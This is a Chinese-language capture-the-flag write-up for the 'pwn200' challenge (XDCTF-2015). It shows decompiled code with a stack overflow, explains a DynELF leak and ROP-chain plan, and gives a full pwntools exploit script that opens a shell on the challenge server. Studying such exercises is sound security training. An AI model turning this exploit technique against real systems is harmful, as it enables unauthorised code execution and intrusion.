題目鏈接

PWN200
題目和JarvisOJ level4很像

檢查保護

利用checksec --file pwn200可以看到開啟了NX防護

靜態(tài)反編譯結(jié)構(gòu)

Main函數(shù)反編譯結(jié)果如下

int __cdecl main()
{
  int buf; // [esp+2Ch] [ebp-6Ch]
  int v2; // [esp+30h] [ebp-68h]
  int v3; // [esp+34h] [ebp-64h]
  int v4; // [esp+38h] [ebp-60h]
  int v5; // [esp+3Ch] [ebp-5Ch]
  int v6; // [esp+40h] [ebp-58h]
  int v7; // [esp+44h] [ebp-54h]

  buf = 1668048215;
  v2 = 543518063;
  v3 = 1478520692;
  v4 = 1179927364;
  v5 = 892416050;
  v6 = 663934;
  memset(&v7, 0, 0x4Cu);
  setbuf(stdout, (char *)&buf);
  write(1, &buf, strlen((const char *)&buf));
  sub_8048484();
  return 0;
}

sub_8048484()反編譯如下：

ssize_t sub_8048484()
{
  char buf; // [esp+1Ch] [ebp-6Ch]

  setbuf(stdin, &buf);
  return read(0, &buf, 0x100u);   //明顯棧溢出
}

EXP思路

利用DynELF泄露出system地址，通過3pop,ret調(diào)用read函數(shù)，將'/bin/sh'寫入到bss段中，之后構(gòu)造ROP鏈system調(diào)用bss段中'/bin/sh'達到提權(quán)目的。
DynELF方法參考安全客的一篇文章【技術(shù)分享】借助DynELF實現(xiàn)無libc的漏洞利用小結(jié)

完整EXP

from pwn import *
io = remote('111.198.29.45','39532')
#io = process('./pwn200')
#context.log_level= 'debug'

elf = ELF('./pwn200')
ppp_r = 0x80485cd
read_got = elf.got['read']
read_plt = elf.plt['read']
main_addr = 0x80484be
start_addr = 0x80483d0
write_plt = elf.plt['write']
write_got = elf.got['write']
func_addr = 0x8048484
def leak(address):
    payload1 = 'A'*112+p32(write_plt)+p32(func_addr)+p32(1)+p32(address)+p32(4)
    io.send(payload1)
    data = io.recv(4)
    print data
    return data
print io.recv()
dyn = DynELF(leak,elf=ELF('./pwn200'))

sys_addr = dyn.lookup('system','libc')
print 'system address: ',hex(sys_addr)
payload = 'a'*112+p32(start_addr)
io.send(payload)
io.recv()
bss_addr =elf.bss()
print 'bss addr: ',hex(bss_addr)

payload = 'a'*112 + p32(read_plt)+p32(ppp_r)+p32(0)+p32(bss_addr)+p32(8)
payload +=p32(sys_addr)+p32(func_addr)+p32(bss_addr)
io.send(payload)
io.send('/bin/sh')


io.interactive()

參考文章：

[1] (攻防世界）（XDCTF-2015）pwn200